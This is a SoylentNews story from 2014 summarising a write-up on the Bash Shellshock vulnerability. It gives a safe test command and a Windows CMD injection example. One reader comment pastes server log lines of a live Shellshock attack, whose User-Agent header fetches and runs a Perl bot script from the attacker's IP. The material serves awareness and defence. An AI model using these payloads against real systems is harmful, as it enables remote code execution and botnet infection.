Stories
Slash Boxes
Comments

SoylentNews is people

Shellshock Detection, Prevention, Timeline, and Lessons Learned

posted by martyb on Saturday October 11 2014, @01:15PM   Printer-friendly
from the he-who-does-not-learn-from-history dept.

First-time submitter barnsbarns writes:

David Wheeler has a nice write-up of the many aspects of the shellshock vulnerability in Bash, including a timeline of events and commentary on how to prevent vulnerabilities like shellshock in the future.

He even provides a quick test to see if your shell is still susceptible to shellshock:

To determine if a system is vulnerable to shellshock, run the following refined test on a Unix-like system command line (this should work on any Bourne or C shell):

env foo='() { echo not patched; }' bash -c foo

This will reply “bash: foo: command not found” on a repaired system, while a vulnerable system will typically reply “not patched” instead. The initial “env” can be omitted when typing the command into a POSIX/Bourne shell (including bash, dash, and ash).

The write-up shows that several mis-identifications of the problem were communicated, as well as how multiple solutions were constructed—thanks to the code being open-source.

He also presents a similar type of defect under Microsoft Windows where, in a CMD.EXE window, issuing these commands:

  set foo=bar^&ping -n 1 localhost
  echo %foo%

will not only display the value of the "foo" environment variable, it will also cause a ping command to be executed.

[Update: fixed formatting of code sample.]

 
This discussion has been archived. No new comments can be posted.
Shellshock Detection, Prevention, Timeline, and Lessons Learned | Log In/Create an Account | Top | 30 comments | Search Discussion
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

  • (Score: 2) by francois.barbier on Monday October 13 2014, @01:32PM

    by francois.barbier (651) on Monday October 13 2014, @01:32PM (#105536)
    A little bit late, but I got this in my logs just now:

    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /cgi-sys/php5? HTTP/1.1" 301 579 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 69
    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /phppath/php? HTTP/1.1" 301 577 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 71
    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 301 593 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 58
    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /cgi-bin/php? HTTP/1.1" 301 577 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 58
    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /cgi-bin/php5? HTTP/1.1" 301 579 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 188
    94.102.63.238 - - [13/Oct/2014:15:23:56 +0200] "GET /cgi-bin/php5-cli? HTTP/1.1" 301 587 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 95

    Here is the code of the shell script it tries to run: http://pastebin.com/6z9gfdSx [pastebin.com]

    Starting Score:    1  point
    Karma-Bonus Modifier   +1  
    Total Score:   2